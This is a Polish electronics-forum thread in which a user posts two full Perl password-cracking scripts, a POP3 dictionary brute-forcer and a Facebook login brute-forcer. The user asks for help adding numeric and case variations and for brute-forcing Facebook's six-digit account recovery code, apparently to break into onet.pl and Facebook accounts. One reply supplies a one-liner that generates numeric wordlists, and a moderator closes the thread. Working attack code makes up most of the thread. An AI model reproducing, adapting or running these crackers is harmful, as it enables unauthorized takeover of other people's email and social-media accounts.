Elektroda.pl
Elektroda.pl
X
Relpol
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Jak modyfikować skrypt bruteforce

annagolabek 22 Gru 2016 13:06 843 12
  • #1 22 Gru 2016 13:06
    annagolabek
    Uczeń

    Jest taki skrypt w perlu na pocztę onet.pl

    Spoiler:
    Code:
    #!/usr/bin/perl 
    
    # HAckers Venezuela http://www.hven.com.ve
    # HV-POP3 Crack       07/06/99
    # By DoctorX   email: d0ct0r_x(malpa)hven.com.ve
    #
    # This Program make a Brute Force attack against the POP3 based in a
    # Dictionary File, only that you need is a valid account and a Big List of
    # Word.
    #
    # Tested on  Red Hat 5.2,6.0  Slackware 3.6
    #
    # Fixes      : - update  POP3 Server to  Secure POP3
    #              - make a filtering of POP3 port(110)
    #              - Contact me :-)
    #
    # Nota : This Program was made for educative issues only
    #        We Don't Care for the Things that you do with it
    #
    # Thanks to : Kliber       ....................... Hot Dog Manager :-)
    #             darkdeath    ....................... lainus Man :-P
    #             DunkelSeite  ....................... SuperWebMan alias Ulcera
    #             LabX         ....................... Exploits Box
    #             Kliberlandia ....................... HV-ZONE
    #             HVLAN        ....................... The Battle Zone
    #             Drake        ....................... LaQuemazon
    #             Cyber_Optik  ....................... ThioZhino
    #
    #       Excuse my Bad English
    #       Viva VENEZUELA!!!!!!!!!!!!!!!!!!!!!!!!

    system clear;

    use Socket;
    $port = 110;
    $victima = $ARGV[0];
    $login = $ARGV[1];
    $archivo = $ARGV[2];
    if(@ARGV < 3) { &jeje;exit;}
    $linea = " ===============================================================\n";
    $mem1 = " Hackers Venezuela http://www.hven.com.ve\n";
    $mem2 = " HV-POP3 Crack 07/06/99\n";
    $mem3 = " by DoctorX email: d0ct0r_x\@\hven.com.ve\n";
    open (LISTA,"$archivo");
    $count = 0 ;
    while ($entrada = <LISTA>){
    chop $entrada;
    $count++;
    @nombres[$count] = $entrada ;
    }
    close(LISTA);
    $total_lista = $count;




    $verga = $count;
    print $linea;
    print $mem1;
    print $mem2;
    print $mem3;
    print $linea;
    $mem10 = " Total of Words : $count\n";
    $mem11 = " Brute Force Attack ......!\n";
    $mem4 = " User : $login\n";
    print $mem10;
    print $mem11;
    print $mem4;
    $verga--;
    print " Accounts : 1   The Rest : $verga  \n" ;
    print $linea;
    $contador = 1;
    for ($y=0;$y<=$count;$y++){
    $pass = @nombres[$y];
    $mem9 = "user $login\n";
    $mem8 = "pass $pass\n";

    $NETFD = &makeconn($victima, $port);
    sysread $NETFD, $message,100 or die "error Can't Read Socket Socket:$!";
    send($NETFD,$mem9,0);
    sysread $NETFD, $message,100 or die "error Can't Read Socket:$!";
    send($NETFD,$mem8,0);
    sysread $NETFD, $message,3 or die "error Can't Read Socket:$!";
     if($message eq "+OK"){ &refrescar($count,$y,$login) ; print " Account Cracked  login: $login \n"; print "                 
    pass : \"$pass\" :-)\n"; print $linea; exit;}
     if($message eq " +O"){ print " Account not  Cracked login: $login \n"; print "                  pass : \"$pass\" :-)\n"; print
    $linea; exit;}
     close $NETFD;
    $contador++;
    if($contador eq "6"){ $contador = 0; &refrescar($count,$y,$login);}
     }
    print " Bad Milk  \"$login\" Account not Cracked!! :-(\n";
    print $linea;
    sub makeconn {
    my ($host, $portname, $server, $pt,$pts, $proto, $servaddr);
    $host = $_[0];
    $pt = $_[1]; 
    $server = gethostbyname($host) or
    die "gethostbyname: cannot locate host: $!";
    $pts = getservbyport($pt, 'tcp') or
    die "getservbyname: cannot get port : $!";
    $proto = getprotobyname('tcp') or die " : $!";
    $servaddr = sockaddr_in($pt, $server);
    socket(CONNFD, PF_INET, SOCK_STREAM, $proto);
    connect(CONNFD, $servaddr) or die "connect : $!";
    return CONNFD;
     }

    sub jeje {
    my ($sal1,$sal2,$sal3,$sal4,$sal5);
    $sal1 = " Hackers Venezuela http://www.hven.com.ve \n";
    $sal2 = " HV-POP3 Crack 07/06/99\n"; 
    $sal3 = " by DoctorX email: d0ct0r_x\@\hven.com.ve\n";
    $sal4 = " ===============================================================\n";
    $sal5 = " issue : perl hv-pop3 host  login  words_file\n";
    print $sal4;
    print $sal1;
    print $sal2;
    print $sal3;
    print $sal4;
    print $sal5;
    print $sal4;
    }
    sub refrescar {
    my ($sal1,$sal2,$sal3,$sal4,$sal5);
    system clear;
    $sal1 = " Hackers Venezuela http://www.hven.com.ve \n";
    $sal2 = " HV-POP3 Crack 07/06/99\n"; 
    $sal3 = " by DoctorX email: d0ct0r_x\@\hven.com.ve\n";
    $sal4 = " ===============================================================\n";
    $total = $_[0];
    $intentos = $_[1];
    $account = $_[2];
    $restantes = $total - $intentos;
    $sal5 = " Words Probed : $intentos  ";
    $sal6 = " Less Words  : $restantes \n";
    $user = " User : $account\n";
    print $sal4;
    print $sal1;
    print $sal2;
    print $sal3;
    print $sal4;
    print $mem10,$mem11,$user;
    print $sal5;
    print $sal6;
    print $sal4;
    }


    Jak go zmodyfikować żeby też różne liczby sprawdzał przy każdyn wyrazie oraz duże i małe litery

    Code:
    http://www.securiteam.com/tools/5ZP0N20GAW.html

    0 12
  • Relpol
  • #2 22 Gru 2016 17:24
    bogiebog
    Specjalista Sieci, Internet

    Znam perla, ale nie rozumiem pytania.

    0
  • #3 22 Gru 2016 20:51
    annagolabek
    Uczeń

    W poczcie onet.pl przeważnie w haśle do wyrazu dodają jakąś liczbę i jak zmodyfikować skrypt żeby przy hakowaniu słownikowym uwzględniał różne liczby przy każdym wyrazie

    0
  • #4 22 Gru 2016 21:07
    bogiebog
    Specjalista Sieci, Internet

    Zby mało konkretne wymaganie, weżmy dla przykładu słowo "haker"
    Jakich kombinacji dla tego słowa potrzebujesz ?

    0
  • Relpol
  • #5 22 Gru 2016 21:41
    annagolabek
    Uczeń

    Zmodyfikujcie ten skrypt żeby liczby przy wyrazach uwzględniał





    Jak go zmodyfikować żeby tutaj użyć słownika z imionami
    Jak modyfikować skrypt bruteforce






    albo żeby same 6 cyfrowe liczby generował


    Code:
    https://www.facebook.com/recover

    Jak modyfikować skrypt bruteforce

    0
  • #7 22 Gru 2016 22:20
    annagolabek
    Uczeń

    tu jest skrypt do facebooka ale do normalnego logowania


    Spoiler:
    Code:
    #!/usr/bin/perl
    
    #
    # Tool: Imad'Ox Bruter
    # Author: Imad'Ox Hunter
    # Contact: imadelouajib(malpa)gmail.com
    # Code date: 17 April 2013
    #
    #
    # Description:
    # Imad'Ox Cracker is a password cracking tool written in perl to perform a dictionary-based attack on a specific Facebook user through HTTPS.
    #
    # Usage:
    # perl Imad'Ox-Bruter.pl login wordlist
    # login could be either a user's email address or profile name
    #
    # Module Requirements:
    #
    # Install module if missing:
    # perl -MCPAN -e 'install Net::SSLeay'
    #
    # Demo:
    # perl Imad'Ox-Bruter.pl Facebooklogin(malpa)facebook.com wordlist.lst
    #
    # --- Imad'Ox-Bruter Facebook password cracking tool
    # --- By Imad'Ox Hunter
    # --- www.facebook.com/imad.elouajib
    #
    # [+] Cracking Facebooklogin(malpa)facebook.com ...
    #
    # [-] test -> Failed
    # [-] test123 -> Failed
    # [-] testtest -> Failed
    # [-] testest123 -> Failed
    # [-] qwerty -> Failed
    # [-] azerty -> Failed
    # [-] password -> Failed
    # [-] password123 -> Failed
    #
    ########################################################
    # [+] CRACKED! Your password is P@$$W0RD
    ########################################################
    #

    use strict;
    use Net::SSLeay::Handle;

    if(!defined($ARGV[0] && $ARGV[1])) {

    system('clear');
    print "\n+++ Imad'Ox-Bruter Facebook password Bruter\n";
    print "+++ Coded by Imad'Ox-Hunter\n";
    print "+++ www.fb.com/imad.elouajib\n\n";
    print "+++ Usage: perl $0 login wordlist\n\n";
    exit; }

    my $user = $ARGV[0];
    my $wordlist = $ARGV[1];

    open (LIST, $wordlist) || die "\n[-] No Wordlist On $wordlist -_- \n";

    print "\n+++ Imad'Ox-Bruter Facebook password Bruter\n";
    print "+++ Coded by Imad'Ox-Hunter\n";
    print "+++ www.fb.com/imad.elouajib\n";
    print "\n[+] Now Cracking $user ...\n\n";

    while (my $password = <LIST>) {
    chomp ($password);
    $password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf "%%%0x", ord $1 /eg;

    my $a = "POST /login.php HTTP/1.1";
    my $b = "Host: www.facebook.com";
    my $c = "Connection: close";
    my $e = "Cache-Control: max-age=0";
    my $f = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
    my $g = "Origin: https://www.facebook.com";
    my $h = "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31";
    my $i = "Content-Type: application/x-www-form-urlencoded";
    my $j = "Accept-Encoding: gzip,deflate,sdch";
    my $k = "Accept-Language: en-US,en;q=0.8";
    my $l = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3";

    my $cookie = "cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa";
    my $post = "lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In";
    my $cl = length($post);
    my $d = "Content-Length: $cl";


    my ($host, $port) = ("www.facebook.com", 443);

    tie(*SSL, "Net::SSLeay::Handle", $host, $port);
     

    print SSL "$a\n";
    print SSL "$b\n";
    print SSL "$c\n";
    print SSL "$d\n";
    print SSL "$e\n";
    print SSL "$f\n";
    print SSL "$g\n";
    print SSL "$h\n";
    print SSL "$i\n";
    print SSL "$j\n";
    print SSL "$k\n";
    print SSL "$l\n";
    print SSL "$cookie\n\n";

    print SSL "$post\n";

    my $success;
    while(my $result = <SSL>){
    if($result =~ /Location(.*?)/){
    $success = $1;
    }
    }
    if (!defined $success)
    {
    print "[-] $password -> Not Him :( \n";
    close SSL;
    }
    else
    {
    print "\n########################################################\n";
    print "[+] Yuuup!! Pass Cracked => Pass is $password :D\n";
    print "########################################################\n\n";
    close SSL;
    exit;
    }
    }



    Jak modyfikować skrypt bruteforce




    Windows 7 Ultimate SP 1 64 bit
    Code:
    http://strawberryperl.com/


    Strawberry Perl 5.24.0.1 (64bit) mam zainstalowanego

    0
  • #8 23 Gru 2016 00:45
    bogiebog
    Specjalista Sieci, Internet

    perl -e 'foreach (100000..1000000) { print "$_\n"; }' > /tmp/liczby3cyfrowe.txt

    i użyj liczby3cyfrowe.txt zamiast pliku z wyrazami słownikowymi.

    0
  • #9 23 Gru 2016 12:34
    annagolabek
    Uczeń

    gdzie są w skrypie informacje o faceboku żeby go tam generował

    0
  • #10 23 Gru 2016 12:38
    bogiebog
    Specjalista Sieci, Internet

    Nie mogę ci pomóc, brak _dokładnego_ opisu problemu, to co piszesz to się nie trzyma kupy.

    Jak chcesz to kontynuować to zrób reset i zacznij od początku jeszcze raz.
    Załóż nowy temat, tak będzie lepiej, ten nadaje się do kosza.

    0
  • #11 23 Gru 2016 13:33
    annagolabek
    Uczeń

    Żeby na stronie facebooka tak gdzie jest miejsce na 6 cyfrową liczbę żeby je generował metodą bruteforce czy to tak ciężko zrozumieć. Żeby się skrypt z fb łączył

    0
  • #12 23 Gru 2016 20:36
    2675900
    Użytkownik usunął konto  
  • #13 25 Gru 2016 14:29
    arnoldziq
    Moderator Programowanie

    Zamykam, zanim będzie trzeba kogoś zablokować :/

    0